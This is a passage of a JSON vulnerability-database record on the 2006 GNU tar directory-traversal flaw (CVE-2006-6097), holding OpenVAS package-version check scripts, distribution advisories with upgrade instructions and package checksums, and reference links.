1;\n}\nif(isslkpkgvuln(pkg:\"tar\", ver:\"1.16-i486-1_slack9.1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"tar\", ver:\"1.16-i486-1_slack10.0\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"tar\", ver:\"1.16-i486-1_slack10.1\", rls:\"SLK10.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"tar\", ver:\"1.16-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"tar\", ver:\"1.16-i486-1_slack11.0\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:19", "references": [], "pluginID": "57949", "description": "The remote host is missing updates announced in\nadvisory GLSA 200612-10.", "edition": 2, "reporter": "Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Gentoo Security Advisory GLSA 200612-10 (tar)", "type": "openvas", "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6097"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57949", "id": "OPENVAS:57949", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Tar is vulnerable to directory traversal possibly allowing for the\noverwriting of arbitrary files.\";\ntag_solution = \"All Tar users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-arch/tar-1.16-r2'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200612-10\nhttp://bugs.gentoo.org/show_bug.cgi?id=155901\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200612-10.\";\n\n \n\nif(description)\n{\n script_id(57949);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-6097\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:N/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200612-10 (tar)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-arch/tar\", unaffected: make_list(\"ge 1.16-r2\"), vulnerable: make_list(\"lt 1.16-r2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:45", "references": [], "pluginID": "57685", "description": "The remote host is missing an update to tar\nannounced via advisory DSA 1223-1.\n\nTeemu Salmela discovered a vulnerability in GNU tar that could allow a\nmalicious user to overwrite arbitrary files by inducing the victim to\nattempt to extract a specially crafted tar file containing a\nGNUTYPE_NAMES record with a symbolic link.", "edition": 2, "reporter": "Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "title": "Debian Security Advisory DSA 1223-1 (tar)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6097"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57685", "id": "OPENVAS:57685", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1223_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1223-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge), this problem has been fixed in\nversion 1.14-2.3\n\nFor the unstable distribution (sid) and the forthcoming stable release\n(etch), this problem will be fixed in version 1.16-2.\n\nWe recommend that you upgrade your tar package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201223-1\";\ntag_summary = \"The remote host is missing an update to tar\nannounced via advisory DSA 1223-1.\n\nTeemu Salmela discovered a vulnerability in GNU tar that could allow a\nmalicious user to overwrite arbitrary files by inducing the victim to\nattempt to extract a specially crafted tar file containing a\nGNUTYPE_NAMES record with a symbolic link.\";\n\n\nif(description)\n{\n script_id(57685);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:17:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-6097\");\n script_bugtraq_id(21235);\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:N/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1223-1 (tar)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"tar\", ver:\"1.14-2.3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:38:14", "references": [], "pluginID": "136141256231065492", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n tar\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5016710 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "edition": 1, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-10-10T00:00:00", "type": "openvas", "title": "SLES9: Security update for tar", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6097"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065492", "id": "OPENVAS:136141256231065492", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5016710.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for tar\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n tar\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5016710 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65492\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-6097\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:N/I:P/A:P\");\n script_name(\"SLES9: Security update for tar\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"tar\", rpm:\"tar~1.13.25~325.8\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "slackware": [{"lastseen": "2018-08-31T00:36:38", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "10.2", "packageVersion": "1.16", "arch": "i486", "packageFilename": "tar-1.16-i486-1_slack10.2.tgz", "packageName": "tar", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "8.1", "packageVersion": "1.16", "arch": "i386", "packageFilename": "tar-1.16-i386-1_slack8.1.tgz", "packageName": "tar", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "10.0", "packageVersion": "1.16", "arch": "i486", "packageFilename": "tar-1.16-i486-1_slack10.0.tgz", "packageName": "tar", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "9.1", "packageVersion": "1.16", "arch": "i486", "packageFilename": "tar-1.16-i486-1_slack9.1.tgz", "packageName": "tar", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "9.0", "packageVersion": "1.16", "arch": "i386", "packageFilename": "tar-1.16-i386-1_slack9.0.tgz", "packageName": "tar", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "10.1", "packageVersion": "1.16", "arch": "i486", "packageFilename": "tar-1.16-i486-1_slack10.1.tgz", "packageName": "tar", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "11.0", "packageVersion": "1.16", "arch": "i486", "packageFilename": "tar-1.16-i486-1_slack11.0.tgz", "packageName": "tar", "operator": "lt"}], "description": "New tar packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1,\n10.2, and 11.0 to fix a security issue.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6097\n\n\nHere are the details from the Slackware 11.0 ChangeLog:\n\npatches/packages/tar-1.16-i486-1_slack11.0.tgz:\n Upgraded to tar-1.16.\n This fixes an issue where files may be extracted outside of the current\n directory, possibly allowing a malicious tar archive, when extracted, to\n overwrite any of the user's files (in the case of root, any file on the\n system).\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6097\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\nfrom ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/tar-1.16-i386-1_slack8.1.tgz\n\nUpdated package for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/tar-1.16-i386-1_slack9.0.tgz\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/tar-1.16-i486-1_slack9.1.tgz\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/tar-1.16-i486-1_slack10.0.tgz\n\nUpdated package for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/tar-1.16-i486-1_slack10.1.tgz\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/tar-1.16-i486-1_slack10.2.tgz\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/tar-1.16-i486-1_slack11.0.tgz\n\n\nMD5 signatures:\n\nSlackware 8.1 package:\n7c9534ea20e4dea9481d2e5389ccb028 tar-1.16-i386-1_slack8.1.tgz\n\nSlackware 9.0 package:\n876549ce9871fe255e53f6941d652955 tar-1.16-i386-1_slack9.0.tgz\n\nSlackware 9.1 package:\nc1de51bb69fbecd26c9b7ee317b92fa7 tar-1.16-i486-1_slack9.1.tgz\n\nSlackware 10.0 package:\n75e329799b7bf0d536fab1debea5c301 tar-1.16-i486-1_slack10.0.tgz\n\nSlackware 10.1 package:\n7a97719499b08cefb77fb0aaee4e2a80 tar-1.16-i486-1_slack10.1.tgz\n\nSlackware 10.2 package:\nc64be78f5930f9e9557f5ec8b783b7ec tar-1.16-i486-1_slack10.2.tgz\n\nSlackware 11.0 package:\n9832de4337bd8e1bd6e43c18e06885dc tar-1.16-i486-1_slack11.0.tgz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg tar-1.16-i486-1_slack11.0.tgz", "edition": 3, "reporter": "Slackware Linux Project", "published": "2006-12-01T14:55:57", "title": "tar", "type": "slackware", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-6097"], "modified": "2006-12-01T14:55:57", "id": "SSA-2006-335-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.469379", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:27", "references": [], "description": "## Solution Description\nUpgrade to version 1.16.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor Specific News/Changelog Entry: http://kb.vmware.com/kb/5031800\n[Vendor Specific Advisory URL](http://www.ubuntu.com/usn/usn-385-1)\n[Vendor Specific Advisory URL](http://www.debian.org/security/2006/dsa-1223)\n[Vendor Specific Advisory URL](https://issues.rpath.com/browse/RPL-821)\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1223)\n[Vendor Specific Advisory URL](http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.469379)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20061202-01-P.asc)\n[Vendor Specific Advisory URL](http://frontal2.mandriva.com/security/advisories?name=MDKSA-2006:219)\n[Vendor Specific Advisory URL](http://kb.vmware.com/KanisaPlatform/Publishing/817/2240267_f.SAL_Public.html)\n[Vendor Specific Advisory URL](http://security.freebsd.org/advisories/FreeBSD-SA-06:26.gtar.asc)\n[Vendor Specific Advisory URL](http://www.openpkg.com/security/advisories/OpenPKG-SA-2006.038.html)\n[Vendor Specific Advisory URL](http://www.trustix.org/errata/2006/0068/)\n[Vendor Specific Advisory URL](http://security.gentoo.org/glsa/glsa-200612-10.xml)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2007-015.htm)\nSecurity Tracker: 1017423\n[Secunia Advisory ID:23115](https://secuniaresearch.flexerasoftware.com/advisories/23115/)\n[Secunia Advisory ID:23146](https://secuniaresearch.flexerasoftware.com/advisories/23146/)\n[Secunia Advisory ID:23173](https://secuniaresearch.flexerasoftware.com/advisories/23173/)\n[Secunia Advisory ID:23198](https://secuniaresearch.flexerasoftware.com/advisories/23198/)\n[Secunia Advisory ID:23314](https://secuniaresearch.flexerasoftware.com/advisories/23314/)\n[Secunia Advisory ID:23514](https://secuniaresearch.flexerasoftware.com/advisories/23514/)\n[Secunia Advisory ID:23911](https://secuniaresearch.flexerasoftware.com/advisories/23911/)\n[Secunia Advisory ID:24636](https://secuniaresearch.flexerasoftware.com/advisories/24636/)\n[Secunia Advisory ID:25056](https://secuniaresearch.flexerasoftware.com/advisories/25056/)\n[Secunia Advisory ID:23163](https://secuniaresearch.flexerasoftware.com/advisories/23163/)\n[Secunia Advisory ID:23785](https://secuniaresearch.flexerasoftware.com/advisories/23785/)\n[Secunia Advisory ID:23117](https://secuniaresearch.flexerasoftware.com/advisories/23117/)\n[Secunia Advisory ID:23142](https://secuniaresearch.flexerasoftware.com/advisories/23142/)\n[Secunia Advisory ID:23209](https://secuniaresearch.flexerasoftware.com/advisories/23209/)\n[Secunia Advisory ID:23443](https://secuniaresearch.flexerasoftware.com/advisories/23443/)\nRedHat RHSA: RHSA-2006:0749\nOther Advisory URL: http://www.ipcop.org/modules.php?op=modload&name=News&file=article&sid=31&mode=thread&order=0&thold=0\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2007-May/0007.html\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200612-10.xml\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2006:219\nOther Advisory URL: http://support.avaya.com/elmodocs2/security/ASA-2007-015.htm\nOther Advisory URL: http://security.freebsd.org/advisories/FreeBSD-SA-06:26.gtar.asc\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-11/0344.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0404.html\nMail List Post: http://archives.neohapsis.com/archives/apps/freshmeat/2006-12/0010.html\nFrSIRT Advisory: FRSIRT:ADV-2007-1171\nFrSIRT Advisory: FRSIRT:ADV-2007-0930\nFrSIRT Advisory: ADV-2006-4717\nFrSIRT Advisory: ADV-2006-5102\n[CVE-2006-6097](https://vulners.com/cve/CVE-2006-6097)\nBugtraq ID: 21235\n", "edition": 1, "reporter": "OSVDB", "published": "2006-11-21T07:33:53", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "GNU tar GNUTYPES_NAMES Record Type Traversal Arbitrary File Overwrite", "type": "osvdb", "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-6097"], "modified": "2006-11-21T07:33:53", "href": "https://vulners.com/osvdb/OSVDB:30721", "id": "OSVDB:30721", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2016-09-02T18:24:53", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.14-2.3", "packageFilename": "tar_1.14-2.3_i386.deb", "packageName": "tar", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.14-2.3", "packageFilename": "tar_1.14-2.3_m68k.deb", "packageName": "tar", "arch": "m68k", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.14-2.3.diff", "packageFilename": "tar_1.14-2.3.diff.gz", "packageName": "tar", "arch": "src", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.14-2.3", "packageFilename": "tar_1.14-2.3_arm.deb", "packageName": "tar", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.14-2.3", "packageFilename": "tar_1.14-2.3_mipsel.deb", "packageName": "tar", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.14-2.3", "packageFilename": "tar_1.14-2.3_powerpc.deb", "packageName": "tar", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.14-2.3", "packageFilename": "tar_1.14-2.3_amd64.deb", "packageName": "tar", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.14-2.3", "packageFilename": "tar_1.14-2.3_ia64.deb", "packageName": "tar", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.14-2.3", "packageFilename": "tar_1.14-2.3_mips.deb", "packageName": "tar", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.14-2.3", "packageFilename": "tar_1.14-2.3.dsc", "packageName": "tar", "arch": "src", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.14.orig", "packageFilename": "tar_1.14.orig.tar.gz", "packageName": "tar", "arch": "src", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.14-2.3", "packageFilename": "tar_1.14-2.3_hppa.deb", "packageName": "tar", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.14-2.3", "packageFilename": "tar_1.14-2.3_sparc.deb", "packageName": "tar", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.14-2.3", "packageFilename": "tar_1.14-2.3_s390.deb", "packageName": "tar", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.14-2.3", "packageFilename": "tar_1.14-2.3_alpha.deb", "packageName": "tar", "arch": "alpha", "operator": "lt"}], "description": "Teemu Salmela discovered a vulnerability in GNU tar that could allow a malicious user to overwrite arbitrary files by inducing the victim to attempt to extract a specially crafted tar file containing a GNUTYPE_NAMES record with a symbolic link.\n\nFor the stable distribution (sarge), this problem has been fixed in version 1.14-2.3.\n\nFor the unstable distribution (sid) and the forthcoming stable release (etch), this problem will be fixed in version 1.16-2.\n\nWe recommend that you upgrade your tar package.", "edition": 1, "reporter": "Debian", "published": "2006-12-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "title": "tar -- input validation error", "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2006-6097"], "modified": "2006-12-01T00:00:00", "id": "DSA-1223", "href": "http://www.debian.org/security/dsa-1223", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "centos": [{"lastseen": "2017-10-12T14:45:34", "references": ["https://rhn.redhat.com/errata/RHSA-2006-0749.html", "http://pasi.pirhonen.eu/", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.14-12.RHEL4", "packageFilename": "tar-1.14-12.RHEL4.ia64.rpm", "packageName": "tar", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.13.25-15.RHEL3", "packageFilename": "tar-1.13.25-15.RHEL3.i386.rpm", "packageName": "tar", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.14-12.RHEL4", "packageFilename": "tar-1.14-12.RHEL4.s390.rpm", "packageName": "tar", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.13.25-15.RHEL3", "packageFilename": "tar-1.13.25-15.RHEL3.s390x.rpm", "packageName": "tar", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.14-12.RHEL4", "packageFilename": "tar-1.14-12.RHEL4.x86_64.rpm", "packageName": "tar", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.13.25-15.RHEL3", "packageFilename": "tar-1.13.25-15.RHEL3.s390.rpm", "packageName": "tar", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.14-12.RHEL4", "packageFilename": "tar-1.14-12.RHEL4.src.rpm", "packageName": "tar", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.14-12.RHEL4", "packageFilename": "tar-1.14-12.RHEL4.src.rpm", "packageName": "tar", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.14-12.RHEL4", "packageFilename": "tar-1.14-12.RHEL4.i386.rpm", "packageName": "tar", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.14-12.RHEL4", "packageFilename": "tar-1.14-12.RHEL4.s390x.rpm", "packageName": "tar", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.13.25-15.RHEL3", "packageFilename": "tar-1.13.25-15.RHEL3.ia64.rpm", "packageName": "tar", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.13.25-15.RHEL3", "packageFilename": "tar-1.13.25-15.RHEL3.src.rpm", "packageName": "tar", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.13.25-15.RHEL3", "packageFilename": "tar-1.13.25-15.RHEL3.src.rpm", "packageName": "tar", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.13.25-15.RHEL3", "packageFilename": "tar-1.13.25-15.RHEL3.x86_64.rpm", "packageName": "tar", "arch": "x86_64", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2006:0749\n\n\nThe GNU tar program saves many files together in one archive and can\r\nrestore individual files (or all of the files) from that archive. \r\n\r\nTeemu Salmela discovered a path traversal flaw in the way GNU tar extracted\r\narchives. A malicious user could create a tar archive that could write to\r\narbitrary files to which the user running GNU tar has write access.\r\n(CVE-2006-6097)\r\n\r\nUsers of tar should upgrade to this updated package, which contains a\r\nreplacement backported patch to correct this issue.\n\n**Merged security bulletin from 